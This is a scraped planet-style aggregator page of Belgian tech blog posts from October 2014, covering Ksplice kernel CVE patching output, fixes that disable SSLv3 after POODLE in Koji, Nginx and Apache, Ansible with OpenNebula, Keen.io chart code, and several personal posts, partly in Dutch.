Installing [gmqqylxv] CVE-2010-1187: Denial of service in TIPC
Installing [3a24ltr0] CVE-2010-0291: Multiple denial of service bugs in mmap and mremap
Installing [7mm0u6cz] CVE-2010-1173: Remote denial of service in SCTP
Installing [fd1x4988] CVE-2010-0622: Privilege escalation by futex corruption
Installing [l5qljcxc] CVE-2010-1437: Privilege escalation in key management
Installing [xs69oy0y] CVE-2010-1641: Permission check bypass in GFS2
Installing [lgmry5fa] CVE-2010-1084: Privilege escalation in Bluetooth subsystem.
Installing [j7m6cafl] CVE-2010-2248: Remote denial of service in CIFS client.
Installing [avqwduk3] CVE-2010-2524: False CIFS mount via DNS cache poisoning.
Installing [6qplreu2] CVE-2010-2521: Remote buffer overflow in NFSv4 server.
Installing [5ohnc2ho] CVE-2010-2226: Read access to write-only files in XFS filesystem.
Installing [i5ax6hf4] CVE-2010-2240: Privilege escalation vulnerability in memory management.
Installing [50ydcp2k] CVE-2010-3081: Privilege escalation through stack underflow in compat.
Installing [59car2zc] CVE-2010-2798: Denial of service in GFS2.
Installing [dqjlyw67] CVE-2010-2492: Privilege Escalation in eCryptfs.
Installing [5mgd1si0] Improved fix to CVE-2010-1173.
Installing [qr5isvgk] CVE-2010-3015: Integer overflow in ext4 filesystem.
Installing [sxeo6c33] CVE-2010-1083: Information leak in USB implementation.
Installing [mzgdwuwp] CVE-2010-2942: Information leaks in traffic control dump structures.
Installing [19jigi5v] CVE-2010-3904: Local privilege escalation vulnerability in RDS sockets.
Installing [rg7pe3n8] CVE-2010-3067: Information leak in sys_io_submit.
Installing [n3tg4mky] CVE-2010-3078: Information leak in xfs_ioc_fsgetxattr.
Installing [s2y6oq9n] CVE-2010-3086: Denial of Service in futex atomic operations.
Installing [9subq5sx] CVE-2010-3477: Information leak in tcf_act_police_dump.
Installing [x8q709jt] CVE-2010-2963: Kernel memory overwrite in VIDIOCSMICROCODE.
Installing [ff1wrijq] Buffer overflow in icmpmsg_put.
Installing [4iixzl59] CVE-2010-3432: Remote denial of service vulnerability in SCTP.
Installing [7oqt6tqc] CVE-2010-3442: Heap corruption vulnerability in ALSA core.
Installing [ittquyax] CVE-2010-3865: Integer overflow in RDS rdma page counting.
Installing [0bpdua1b] CVE-2010-3876: Kernel information leak in packet subsystem.
Installing [ugjt4w1r] CVE-2010-4083: Kernel information leak in semctl syscall.
Installing [n9l81s9q] CVE-2010-4248: Race condition in __exit_signal with multithreaded exec.
Installing [68zq0p4d] CVE-2010-4242: NULL pointer dereference in Bluetooth HCI UART driver.
Installing [cggc9uy2] CVE-2010-4157: Memory corruption in Intel/ICP RAID driver.
Installing [f5ble6od] CVE-2010-3880: Logic error in INET_DIAG bytecode auditing.
Installing [gwuiufjq] CVE-2010-3858: Denial of service vulnerability with large argument lists.
Installing [usukkznh] Mitigate denial of service attacks with large argument lists.
Installing [5tq2ob60] CVE-2010-4161: Deadlock in socket queue subsystem.
Installing [oz6k77bm] CVE-2010-3859: Heap overflow vulnerability in TIPC protocol.
Installing [uzil3ohn] CVE-2010-3296: Kernel information leak in cxgb driver.
Installing [wr9nr8zt] CVE-2010-3877: Kernel information leak in tipc driver.
Installing [5wrnhakw] CVE-2010-4073: Kernel information leaks in ipc compat subsystem.
Installing [hnbz3ppf] Integer overflow in sys_remap_file_pages.
Installing [oxczcczj] CVE-2010-4258: Failure to revert address limit override after oops.
Installing [t44v13q4] CVE-2010-4075: Kernel information leak in serial core.
Installing [8p4jsino] CVE-2010-4080 and CVE-2010-4081: Information leaks in sound drivers.
Installing [3raind7m] CVE-2010-4243: Denial of service due to wrong execve memory accounting.
Installing [od2bcdwj] CVE-2010-4158: Kernel information leak in socket filters.
Installing [zbxtr4my] CVE-2010-4526: Remote denial of service vulnerability in SCTP.
Installing [mscc8dnf] CVE-2010-4655: Information leak in ethtool_get_regs.
Installing [8r9231h7] CVE-2010-4249: Local denial of service vulnerability in UNIX sockets.
Installing [2lhgep6i] Panic in kfree() due to race condition in acpi_bus_receive_event.
Installing [uaypv955] Fix connection timeouts due to shrinking tcp window with window scaling.
Installing [7klbps5h] CVE-2010-1188: Use after free bug in tcp_rcv_state_process.
Installing [u340317o] CVE-2011-1478: NULL dereference in GRO with promiscuous mode.
Installing [ttqhpxux] CVE-2010-4346: mmap_min_addr bypass in install_special_mapping.
Installing [ifgdet83] Use-after-free in MPT driver.
Installing [2n7dcbk9] CVE-2011-1010: Denial of service parsing malformed Mac OS partition tables.
Installing [cy964b8w] CVE-2011-1090: Denial of Service in NFSv4 client.
Installing [6e28ii3e] CVE-2011-1079: Missing validation in bnep_sock_ioctl.
Installing [gw5pjusn] CVE-2011-1093: Remote Denial of Service in DCCP.
Installing [23obo960] CVE-2011-0726: Information leak in /proc/[pid]/stat.
Installing [pbxuj96b] CVE-2011-1080, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172: Information leaks in netfilter.
Installing [9oepi0rc] Buffer overflow in iptables CLUSTERIP target.
Installing [nguvvw6h] CVE-2011-1163: Kernel information leak parsing malformed OSF partition tables.
Installing [8v9d3ton] USB Audio regression introduced by CVE-2010-1083 fix.
Installing [jz43fdgc] Denial of service in NFS server via reference count leak.
Installing [h860edrq] Fix a packet flood when initializing a bridge device without STP.
Installing [3xcb5ffu] CVE-2011-1577: Missing boundary checks in GPT partition handling.
Installing [wvcxkbxq] CVE-2011-1078: Information leak in Bluetooth sco.
Installing [n5a8jgv9] CVE-2011-1494, CVE-2011-1495: Privilege escalation in LSI MPT Fusion SAS 2.0 driver.
Installing [3t5fgeqc] CVE-2011-1576: Denial of service with VLAN packets and GRO.
Installing [qsvqaynq] CVE-2011-0711: Information leak in XFS filesystem.
Installing [m1egxmrj] CVE-2011-1573: Remote denial of service in SCTP.
Installing [fexakgig] CVE-2011-1776: Missing validation for GPT partitions.
Installing [rrnm0hzm] CVE-2011-0695: Remote denial of service in InfiniBand setup.
Installing [c50ijj1f] CVE-2010-4649, CVE-2011-1044: Buffer overflow in InfiniBand uverb handling.
Installing [eywxeqve] CVE-2011-1745, CVE-2011-2022: Privilege escalation in AGP subsystem.
Installing [u83h3kej] CVE-2011-1746: Integer overflow in agp_allocate_memory.
Installing [kcmghb3m] CVE-2011-1593: Denial of service in next_pidmap.
Installing [s113zod3] CVE-2011-1182: Missing validation check in signals implementation.
Installing [2xn5hnvr] CVE-2011-2213: Denial of service in inet_diag_bc_audit.
Installing [fznr6cbr] CVE-2011-2492: Information leak in bluetooth implementation.
Installing [nzhpmyaa] CVE-2011-2525: Denial of Service in packet scheduler API
Installing [djng1uvs] CVE-2011-2482: Remote denial of service vulnerability in SCTP.
Installing [mbg8auhk] CVE-2011-2495: Information leak in /proc/PID/io.
Installing [ofrder8l] Hangs using direct I/O with XFS filesystem.
Installing [tqkgmwz7] CVE-2011-2491: Local denial of service in NLM subsystem.
Installing [wkw7j4ov] CVE-2011-1160: Information leak in tpm driver.
Installing [1f4r424i] CVE-2011-1585: Authentication bypass in CIFS.
Installing [kr0lofug] CVE-2011-2484: Denial of service in taskstats subsystem.
Installing [zm5fxh2c] CVE-2011-2496: Local denial of service in mremap().
Installing [4f8zud01] CVE-2009-4067: Buffer overflow in Auerswald usb driver.
Installing [qgzezhlj] CVE-2011-2695: Off-by-one errors in the ext4 filesystem.
Installing [fy2peril] CVE-2011-2699: Predictable IPv6 fragment identification numbers.
Installing [idapn9ej] CVE-2011-2723: Remote denial of service vulnerability in gro.
Installing [i1q0saw7] CVE-2011-1833: Information disclosure in eCryptfs.
Installing [uqv087lb] CVE-2011-3191: Memory corruption in CIFSFindNext.
Installing [drz5ixw2] CVE-2011-3209: Denial of Service in clock implementation.
Installing [2zawfk0b] CVE-2011-3188: Weak TCP sequence number generation.
Installing [7gkvlyfi] CVE-2011-3363: Remote denial of service in cifs_mount.
Installing [8einfy3y] CVE-2011-4110: Null pointer dereference in key subsystem.
Installing [w9l57w7p] CVE-2011-1162: Information leak in TPM driver.
Installing [hl96s86z] CVE-2011-2494: Information leak in task/process statistics.
Installing [5vsbttwa] CVE-2011-2203: Null pointer dereference mounting HFS filesystems.
Installing [ycoswcar] CVE-2011-4077: Buffer overflow in xfs_readlink.
Installing [rw8qiogc] CVE-2011-4132: Denial of service in Journaling Block Device layer.
Installing [erniwich] CVE-2011-4330: Buffer overflow in HFS file name translation logic.
Installing [q6rd6uku] CVE-2011-4324: Denial of service vulnerability in NFSv4.
Installing [vryc0xqm] CVE-2011-4325: Denial of service in NFS direct-io.
Installing [keb8azcn] CVE-2011-4348: Socket locking race in SCTP.
Installing [yvevd42a] CVE-2011-1020, CVE-2011-3637: Information leak, DoS in /proc.
Installing [thzrtiaw] CVE-2011-4086: Denial of service in journaling block device.
Installing [y5efh27f] CVE-2012-0028: Privilege escalation in user-space futexes.
Installing [wxdx4x4i] CVE-2011-3638: Disk layout corruption bug in ext4 filesystem.
Installing [cd2g2hvz] CVE-2011-4127: KVM privilege escalation through insufficient validation in SG_IO ioctl.
Installing [aqo49k28] CVE-2011-1083: Algorithmic denial of service in epoll.
Installing [uknrp2eo] Denial of service in filesystem unmounting.
Installing [97u6urvt] Soft lockup in USB ACM driver.
Installing [01uynm3o] CVE-2012-1583: use-after-free in IPv6 tunneling.
Installing [loizuvxu] Kernel crash in Ethernet bridging netfilter module.
Installing [yc146ytc] Unresponsive I/O using QLA2XXX driver.
Installing [t92tukl1] CVE-2012-2136: Privilege escalation in TUN/TAP virtual device.
Installing [aldzpxho] CVE-2012-3375: Denial of service due to epoll resource leak in error path.
Installing [bvoz27gv] Arithmetic overflow in clock source calculations.
Installing [lzwurn1u] ext4 filesystem corruption on fallocate.
Installing [o9b62qf6] CVE-2012-2313: Privilege escalation in the dl2k NIC.
Installing [9do532u6] Kernel panic when overcommiting memory with NFSd.
Installing [zf95qrnx] CVE-2012-2319: Buffer overflow mounting corrupted hfs filesystem.
Installing [fx2rxv2q] CVE-2012-3430: kernel information leak in RDS sockets.
Installing [wo638apk] CVE-2012-2100: Divide-by-zero mounting an ext4 filesystem.
Installing [ivl1wsvt] CVE-2012-2372: Denial of service in Reliable Datagram Sockets protocol.
Installing [xl2q6gwk] CVE-2012-3552: Denial-of-service in IP options handling.
Installing [l093jvcl] Kernel panic in SMB extended attributes.
Installing [qlzoyvty] Kernel panic in ext3 indirect blocks.
Installing [8lj9n3i6] CVE-2012-1568: A predictable base address with shared libraries and ASLR.
Installing [qn1rqea3] CVE-2012-4444: Prohibit reassembling IPv6 fragments when some data overlaps.
Installing [wed7w5th] CVE-2012-3400: Buffer overflow in UDF parsing.
Installing [n2dqx9n3] CVE-2013-0268: /dev/cpu/*/msr local privilege escalation.
Installing [p8oacpis] CVE-2013-0871: Privilege escalation in PTRACE_SETREGS.
Installing [cbdr6azh] CVE-2012-6537: Kernel information leaks in network transformation subsystem.
Installing [1qz0f4lv] CVE-2013-1826: NULL pointer dereference in XFRM buffer size mismatch.
Installing [s0q68mb1] CVE-2012-6547: Kernel stack leak from TUN ioctls.
Installing [s1c6y3ee] CVE-2012-6546: Information leak in ATM sockets.
Installing [2zzz6cqb] Data corruption on NFSv3/v2 short reads.
Installing [kfav9h9d] CVE-2012-6545: Information leak in Bluetooth RFCOMM socket name.
Installing [coeq937e] CVE-2013-3222: Kernel stack information leak in ATM sockets.
Installing [43shl6vr] CVE-2013-3224: Kernel stack information leak in Bluetooth sockets.
Installing [whoojewf] CVE-2013-3235: Kernel stack information leak in TIPC protocol.
Installing [7vap7ys6] CVE-2012-6544: Information leak in Bluetooth L2CAP socket name.
Installing [0xjd0c1r] CVE-2013-0914: Information leak in signal handlers.
Installing [l2925frf] CVE-2013-2147: Kernel memory leak in Compaq Smart Array controllers.
Installing [lt4qe1dr] CVE-2013-2164: Kernel information leak in the CDROM driver.
Installing [7fkc8czu] CVE-2013-2234: Information leak in IPsec key management.
Installing [0t3omxv5] CVE-2013-2237: Information leak on IPSec key socket.
Installing [e1jtiocl] CVE-2013-2232: Memory corruption in IPv6 routing cache.
Installing [f0bqnvc1] CVE-2013-2206: NULL pointer dereference in SCTP duplicate cookie handling.
Installing [v188ww9y] CVE-2013-2141: Information leak in tkill() and tgkill() system calls.
Installing [0amslrok] CVE-2013-4162: Denial-of-service with IPv6 sockets with UDP_CORK.
Installing [s4w6qq7g] CVE-2012-3511: Use-after-free due to race condition in madvise.
Installing [kvnlhbh1] CVE-2012-4398: Denial-of-service in kernel module loading.
Installing [k77237db] CVE-2013-4299: Information leak in device mapper persistent snapshots.
Installing [ekv19fgd] CVE-2013-4345: Off-by-one in the ANSI Crypto RNG.
Installing [pl4pqen7] CVE-2013-0343: Denial of service in IPv6 privacy extensions.
Installing [ku36xnjx] Incorrect handling of SCSI scatter-gather list mapping failures.
Installing [9jc4vajb] CVE-2013-6383: Missing capability check in AAC RAID compatibility ioctl.
Installing [66nk6gwh] CVE-2013-2929: Incorrect permissions check in ptrace with dropped privileges.
Installing [1vays5jg] CVE-2013-7263: Information leak in IPv4 and IPv6 socket recvmsg.
Installing [g8wy6r2k] CVE-2013-4483: Denial-of-service in IPC subsystem when taking a reference count.
Installing [617yrxdl] CVE-2012-6638: Denial-of-service in TCP's SYN+FIN messages.
Installing [pp6j74s7] CVE-2013-2888: Kernel memory corruption flaw via oversize HID report id.
Installing [pz65qqpk] Panic in GFS2 filesystem locking code.
Installing [p4focqhi] CVE-2014-1737, CVE-2014-1738: Local privilege escalation in floppy ioctl.
Installing [6w9u3383] CVE-2013-7339: NULL pointer dereference in RDS socket binding.
Installing [xqpvy7zh] CVE-2014-4699: Privilege escalation in ptrace() RIP modification.
Installing [ghkc42rj] CVE-2014-2678: NULL pointer dereference in RDS protocol when binding.
Installing [g4qbxm30] CVE-2014-3917: Denial-of-service and information leak in audit syscall subsystem.
Installing [eit799o3] Memory leak in GFS2 filesystem for files with short lifespan.
Your kernel is fully up to date.
Effective kernel version is 2.6.18-398.el5

real	0m59.447s
user	0m22.640s
sys	0m22.611s
1 minute for 215 updates. And this isn't one minute of hang, it applies each patch and just takes a few microseconds to apply. So your applications or users won't experience hangs or hickups at all.

by wcoekaer at October 15, 2014 09:09 PM

FOSDEM organizers

First main track presentations!

We received a lot of good proposals and deciding which ones to accept is not an easy task. A number of proposals are still being reviewed and we are still working with some speakers. We can already announce the following main track presentations: Performance track Title Speaker Building High-Performance Language Implementations With Low Effort Stefan Marr IgProf Giulio Eulisse Superoptimization James Pallister Ubiquitous Performance Analysis and System Introspection Lukas Berk Time track Title Speaker Computers, Clocks and Network Time George Neville-Neil Languages track Title Speaker Design and Implementation of a Perl Number Theory Module Dana Jacobsen

October 15, 2014 03:00 PM

Fabian Arrotin

Koji – CentOS CBS infra and sslv3/Poodle important notification

As most of you already know, there is an important SSLv3 vulnerability (CVE-2014-3566 - see https://access.redhat.com/articles/1232123) , known as Poodle.
While it's easy to disable SSLv3 in the allowed Protocols at the server level (for example SSLProtocol All -SSLv2 -SSLv3 for apache), some clients are still defaulting to SSLv3, and Koji does that.

We currently have disabled SSLv3 on our cbs.centos.org koji instance, so if you're a cbs/koji user, please adapt your local koji package (local fix !)
At the moment, there is no available upstream package, but the following patch has been tested by Fedora people too (and credits go to

https://lists.fedoraproject.org/pipermail/infrastructure/2014-October/014976.html)

=====================================================
- --- SSLCommon.py.orig    2014-10-15 11:42:54.747082029 +0200
+++ SSLCommon.py    2014-10-15 11:44:08.215257590 +0200
@@ -37,7 +37,8 @@
if f and not os.access(f, os.R_OK):
raise StandardError, "%s does not exist or is not
readable" % f

- -    ctx = SSL.Context(SSL.SSLv3_METHOD)   # SSLv3 only
+    #ctx = SSL.Context(SSL.SSLv3_METHOD)   # SSLv3 only
+    ctx = SSL.Context(SSL.TLSv1_METHOD)   # TLSv1 only
ctx.use_certificate_file(key_and_cert)
ctx.use_privatekey_file(key_and_cert)
ctx.load_client_ca(ca_cert)
@@ -45,7 +46,8 @@
verify = SSL.VERIFY_PEER | SSL.VERIFY_FAIL_IF_NO_PEER_CERT
ctx.set_verify(verify, our_verify)
ctx.set_verify_depth(10)
- -    ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_TLSv1)
+    #ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_TLSv1)
+    ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_TLSv1 | SSL.OP_NO_SSLv3)
return ctx
=====================================================

We'll keep you informed about possible upstream koji packages that would default to at least TLSv1

If you encounter a problem, feel free to drop into #centos-devel channel on irc.freenode.net and have a chat with us

by fabian.arrotin at October 15, 2014 10:46 AM

Mattias Geniar

Patch your webservers for the SSLv3 POODLE vulnerability (CVE­-2014­-3566)

First, read this: CVE­-2014­-3566.

Next: realise that the SSL vulnerability in SSLv3 isn't limited to just webservers. It's any client or server that uses the SSLv3 protocol: from SSL tunnels to encryption services to remote management interfaces.

Here's how to apply a quick patch to Nginx and Apache to disable SSLv3 entirely. The current stats show about 0.5-3% of the internet still uses this (mostly Windows XP with IE6), and they will effectively be blocked out of using the HTTPs sites. But since both Windows XP and IE6 have long passed their maximum expiration date, I wouldn't bother.

Internally at Nucleus, we had a brief discussion about this which eventually just ended in the following statement / conclusion.

Here's the situation: SSLv3 has been found to have a major flaw, allowing the traffic to be decrypted (link)

SSLv3 is an 18y-old protocol that has flaws. If we disable the SSLv3 protocol, to fix this flaw, we effectively block any Windows XP user with IE6 from accessing the site. Windows XP with newer browsers (IE6+ or Firefox/Chrome) will not have any problem.

The "problem" is in the way SSL works: any browser can be tricked to downgrade the SSL connection from a secure TLS 1.2 to the old SSLv3. That includes any recent browser. So if we support SSLv3 for older Windows XP/IE6, we effectively make all other -- modern -- browsers vulnerable as well.

Here's the million dollar question: can we disable SSLv3, knowing fully well we then block all Windows XP users with IE6 from accessing the site? Or should we still support SSLv3, effectively rendering SSL mostly useless for _all_ users on the site (because of the SSLv3 downgrade possibilities)?

To disable SSLv3, keeping in mind the comments made above, you can do so as shown below.

Nginx

Change this:

ssl_protocols               SSLv3 TLSv1 TLSv1.1 TLSv1.2;

To this:

ssl_protocols              TLSv1 TLSv1.1 TLSv1.2;

Remove the support for SSLv3 in the Nginx cyphers. Then restart your Nginx service.

Apache

Add the following in your SSL configurations to disable support for older SSLv2 and SSLv3 protocols.

SSLProtocol All -SSLv2 -SSLv3

After the change, restart Apache to make the changes apply.

by Mattias Geniar at October 15, 2014 05:02 AM

October 14, 2014

Frederic Descamps

Get Things Gnome : synchronize multiple computers

Since many years now I use GTG to manage my todo lists. (it can even be ).

I tried to use Remember The Milk service to sync my laptop and my desktop but it wasn't really working well. Then I discovered a nice project : GTGonline, a Django project that allows the synchronization to and from GTG via a backend called backend_gtgonline.

I forked the project to create a branch (that will never be merged it seems) to not hardcode the
url of the service as I host my own version of GTGonline backend.

My branch is https://github.com/lefred/backend_gtgonline/tree/service-url and I also provide a rpm package for Ferdora 20.

AttachmentSize
gtg-backend-gtgonline-0.1-1.fc20.noarch.rpm15.96 KB

by lefred at October 14, 2014 09:37 PM

Amedee Van Gasse

VRT plukt foto’s van Twitter zonder toestemming

Begin september was ik bij een familielid op bezoek in het AZ Nikolaas. Dat weekend waren de Vredefeesten bezig in Sint-Niklaas, waarbij er tientallen warmeluchtballons opstijgen van op de Grote Markt. Een spectaculair schouwspel, waar jaarlijks tienduizenden kijklustigen op afkomen.
Van op de vijfde verdieping van AZ Nikolaas had ik een mooi uitzicht over de stad en de voorbij vliegende ballons. Ik heb de panoramafunctie van mijn Nexus 4 gebruikt en de foto op Twitter geplaatst:

Op de foto zie je een vleugel van het gebouw van AZ Nikolaas, en ik kreeg ook een bezorgde reactie van @mariegoos.
Een tijdje later werd mijn foto ook integraal geretweet door de officiele twitteraccount van @stadsintniklaas. Fijn.

De volgende dag kreeg ik van een kennis bericht dat mijn foto gebruikt werd op de VRT website deredactie.be. Ik ben even gaan zoeken (met Google Image Search) en effectief, de foto staat bij 2 artikels:

Ik ben daar eigenlijk niet zo gelukkig mee. OK, mijn naam staat er wel bij, maar moet dat nu echt, VRT? Is dit het gevolg van de opgelegde besparingen? 92.000 mensen kwamen naar de Vredefeesten, zaten daar echt geen professionele fotografen bij? Die mensen moeten ook het beleg op hun boterham verdienen! Ik ben maar een amateur die een beetje met zijn smartphone zat te prutsen, en ik vind het zelf niet eens een mooie foto.

Ik heb mijn licht eens opgestoken bij bevriende fotografen (dankjewel Monica en Evy) en ik heb de SOFAM-tarieven geraadpleegd. Blijkbaar kan ik 110.30 euro vragen per gebruik van een foto, + 200% schadevergoeding wegens geen toestemming gevraagd of gegeven, + 200% schadevergoeding wegens schending van de integriteit (want ze hebben een stuk weggeknipt, waardoor de context van het AZ Nikolaas verloren ging).
Dat komt dus in totaal op 1103 euro.

En NEEN, het is niet omdat iets op Twitter, Facebook, Instagram of soortgelijken staat, dat je het zomaar mag gebruiken. Volgens de regeltjes van Twitter mag je een tweet maar overnemen als het een embedded tweet is, zoals mijn tweet hierboven. Dus de integrale tweet, inclusief de context. Niet een stukje van de tweet, zoals een (deel van een) foto.

Ik heb een onkostennota verstuurd naar de VRT. Het bedrag dat ze me gaan betalen (if any), ga ik integraal doorstorten naar het Fonds Pascal Decroos voor Onderzoeksjournalistiek.

EDIT: deze blogpost is nog geen half uur gepubliceerd en ik zie in Google Analytics dat er al een referral is van contactbeheer.vrt.be. Ze hebben het dus gezien.

The post VRT plukt foto’s van Twitter zonder toestemming appeared first on amedee.be.

by Amedee Van Gasse at October 14, 2014 09:23 AM

Frank Goossens

Mooie Muziekje; “Neerhof” van Lieven

Afgelopen weekend met enige vertraging (dank U HD recorder) genoten van “Belpop” over de indrukwekkende carrière van Jean Blaute. Het mooiste kwam helemaal op het einde, toen je hem samen met Eric Melaerts een stukje van “Neerhof” van Lieven (Coppieters) hoorde zingen uit hun “Gedeelde Adoraties”-tournee. Dit is het origineel:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

“Neerhof” komt uit Lievens enige album, Jus D’orange uit 1976, dat met een rist aan jazz-muzikanten (o.a. Marc Moulin, Eef Albers en Bruno Castellucci) werd opgenomen. Maar het nummer staat als een huis, zelfs zonder woorden, arrangementen en jaren 70 gitaar- en dwarsfluit solo’s, luister maar naar deze door Coppieters zelf upgeloade “Guitar CHORDS”-versie.

by frank at October 14, 2014 05:22 AM

October 12, 2014

Mattias Geniar

You Need Passion

(This article was written in May 2012, but for some reason never got published. Better late than never, I assume)

I read, with great interest, Davy Kesten's article on "Just do it". It's to-the-point and he makes for very compelling arguments, which to most extent I agree.

There is just one quote that bothered me in that article.

The difference between successful entrepreneurs and jokers isn't passion. It isn’t luck. It isn’t money. It isn’t their network. It isn’t knowledge. It’s the fact that they simply DO.

Passion.

Perhaps I've read the article with another mindset (not that of an entrepreneur) but that doesn't matter. The article is about accomplishing your goals instead of talking about it, that's true for everyone -- regardless of what you do in life. But if you want to accomplish something, you need to be passionate about it. If you are, truely, passionate, you'll accomplish your goals no matter what. You'll "just do" automatically, because you *want to*. It's what drives you.

I'm a geek myself, and the article reminded me of a quote I particularly like. It's hard to track the original source of this, but from what I can tell it could be @hijinksensue on Twitter.

Geeks don't just have interests, they have passions.

If you're passionate about something, you'll go for it. It's that simple. Whether it's coding a new app, discovering a new tool you want to master or traveling around the world, if you're truely passionate you will achieve your goals.

To me, the difference between a "do'er" and a "joker" isn't just the fact they "just do it", but whatever it is that drives to "just do" in the first place.

by Mattias Geniar at October 12, 2014 08:22 AM

October 11, 2014

Vincent Van der Kussen

Ansible and Opennebula

Recently we decided to deploy a private cloud to replace our RHEV setup. The reasoning behind this will be covered in an other blog post, but the main reason was the higher level of automation we could achieve with Opennebula compared to RHEV. In this post I would like to talk about how we used Ansible to help us with the setup of Opennebula and what we are going to do in the near future.

Why Ansible? Well, we were already using Ansible to perform repeatable deployments in our test environments to save us some valuable time compared to "manual" setups. This way we can test new code or deploy complete test environments faster.

So when we decided to deploy Opennebula we started writing ansible playbooks from the first start because we wanted to test several setups until we had a configuration that we found performant enough and was configured the way we wanted. This allowed us to rebuild the complete setup from scratch (using Cobbler for physical deployments) and have a fresh setup 30min later. This included a fully configured setup with Opennebula Management Node, Hypervisors(kvm) and everything we needed to further configure our Gluster storage backend.

One of the advantages of Ansible is that it is not just a configuration management tool but can do orchestration to. Opennebula for example uses SSH to communicate to all the hypervisor nodes. So during the deployment of a hypervisor node we use the delegate_to module to fetch the earlier generated ssh keys and deploy them on the hypervisor. Pretty convenient..

We currently have quite complete playbooks that use a combination of 3 roles. They do need some testing and when we feel they can be used by other people too, we'll put them on the Ansible Galaxy.

Until now we haven't used Ansible to keep our config in sync or to do updates, but it's something we have in the pipeline and should be quite trivial using the current Ansible playbooks.

Another thing we'll start working on are modules to support Opennebula. We already had a look at the possibilities Opennebula provides and should be quite trivial to build using its API.

We are very pleased with both projects as they aim to keep things simple which is important to us since we are a very small team and have to move forward at a rather fast pace.

The playbooks can be found on github

by Vincent Van der Kussen at October 11, 2014 10:00 PM

October 10, 2014

Sébastien Wains

PreserveFQDN and EscapeControlCharactersOnReceive with rsyslog

In legacy versions of rsyslog, if you want to use the option PreserveFQDN, you have to set the option before anything else, or it wouldn’t work.

If you are having issues sending logs from nxlog on Windows to rsyslog legacy, you might want to have a look at EscapeControlCharactersOnReceive.

http://www.rsyslog.com/doc/rsconf1_escapecontrolcharactersonreceive.html

by Sébastien at October 10, 2014 06:14 PM

Frederic Hornain

CME Group finds a long-term partner in Red Hat

KR

Frederic


by Frederic Hornain at October 10, 2014 07:06 AM

October 09, 2014

Dieter Adriaenssens

Custom multiseries trend using Keen.io API

The initial goal was to create a trend of event data related to the time of day or day of week when the event occured. Later on, it seemed like a good idea to display different timeframes on the same trend.

The end result shows a trend, calculating an average value of a metric (buildtime duration, in this example) for all events that occured in the same time interval (day of week, in this example), for different timeframes (last week, month and year, in this example), which are displayed as different series in the same chart, to be able to compare them and visually notice an evolution or an anomally.

This trend is part of the Buildtime Trend project, you can see the code in action here.

Read on to see how it is done.
The Keen.io service and API is used to store, analyse and visualise the event data. I'd like to refer to the Keen.io tutorials on how to create a query and generate a chart.

Generate and group by time intervals

 

First of all, the event data has a timestamp, so in a simplified example, an event would look like this :

  { id: "1234abcd", duration: "97", timestamp: "2014-10-09T18:32:14Z"}

But to group events on time intervals, like day of week, or hour (time of day), the timestamp  has to be split into its components (thanks to Ryan Spraetz of Keen.io for the suggested workaround), for example :

  {id: "1234abcd",
    duration: "97",
    timestamp: {
      isotimestamp: "2014-10-09T18:32:14Z",
      day_of_week: 4,
      hour_24: 18,
      hour_12 : 6,
      hour_AMPM : PM,
      ... 
    }
  }


Look here for the code to split the timestamp (in Python) and a full example of a split timestamp.

A query to group events by day of week, calculating an average value of duration, for all events of the last week, would look like this :

var queryLastWeek = new Keen.Query("average", {
eventCollection: "builds",
timeframe: "last_week",
targetProperty: "duration",
groupBy: "timestamp.day_of_week"
}); 
 
Using an example from the Keen.io tutorial, you could easily create a chart with one series of data.
If timeframe is changed to 'last_month' or 'last_year', you get the same query for a longer timeframe.

Combine several queries in one chart


So now we have 3 queries : queryLastWeek, queryLastMonth and queryLastYear

Which are passed as parameters to the Keen.io client.run method, where the result of the 3 queries are merged to one array by method mergeSeries (see below). This merged array (chart_data) is passed to keen.Visualisation to draw the chart you can see at the top of this post :
var request = client.run([queryLastWeek, queryLastMonth, queryLastYear], function() {
  series_captions = ["Last week", "Last month", "Last year"];
  index_captions = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"];
  chart_data = mergeSeries(
    this.data,
    index_captions,
    "timestamp.day_of_week",
    series_captions
  );
  // draw chart
  window.chart = new Keen.Visualization(
    {result: chart_data},
    document.getElementById("chart_avg_buildtime_weekday"),
    {
       chartType: "columnchart",
       title: "Average buildtime per day of week",
       chartOptions: {
       vAxis: { title: "duration [s]" },
       hAxis: { title: "Day of week" }
    }
  });
});

You can find the full code here.

Merge data series

First this methods creates a multilevel array with i rows (one for each series, in this example i = 3 (week, month, year)) and j columns (one for each index value in the query, in this example j = 7 : 'Sun' to 'Sat').
Then the methods takes the Keen.io data array, with the results of all queries as a parameter, loops over the result from each query and assigns the values to the corresponding index in a multilevel array. As a result all values corresponding to 'Monday' will be in the same place in the array.
function mergeSeries(data, index_captions, value_caption, series_captions) {
  chart_data = [];
  // create and populate data array
  for (i = 0; i < index_captions.length; i++) {
    chart_data[i]={caption: index_captions[i]};
    // populate all series
    for (j = 0; j < series_captions.length; j++) {
      chart_data[i][series_captions[j]] = 0;
    }
  }
  // loop over all query result sets
  for (j = 0; j < data.length; j++) {
    timeframe_result = data[j].result;
    timeframe_caption = series_captions[j];
    // copy query data into the populated array
    for (i = 0; i < timeframe_result.length; i++) {
      index = parseInt(timeframe_result[i][value_caption])
      chart_data[index][timeframe_caption] = timeframe_result[i]["result"];
    }
  }
  return chart_data;
}

Some improvements

Some ideas to make it more efficiently:

by Dieter Adriaenssens (noreply@blogger.com) at October 09, 2014 10:33 PM

Dries Buytaert

Acquia honored by Belgian-American Chamber of Commerce

Topic: 

My company Acquia was honored this week by BelCham, the Belgian-American Chamber of Commerce, as the "Company of the Year". I'm proud of this honor, which speaks to the great work that our team of more than 500 Acquians from around the globe do for our customers everyday.

BelCham is an organization dedicated to helping Belgian entrepreneurs navigate the complexities of Belgian-American trade. Companies like Acquia, InBev, Brussels Airlines, and restaurant chain Le Pain Quotidien support BelCham's work.

If you want to build a big company, then at some point you have scale globally. Scaling a business globally is challenging. I try to give back some of my experience by advising Belgian entrepreneurs that want to move or expand to the US. I often recommend they get in touch with BelCham because they can help entrepreneurs find the resources they need to extend their network and grow globally.

by Dries at October 09, 2014 07:57 AM

October 07, 2014

Joost Damad

Driving WS2812 Programmable RGB LEDs using hardware SPI

New blog post available at:

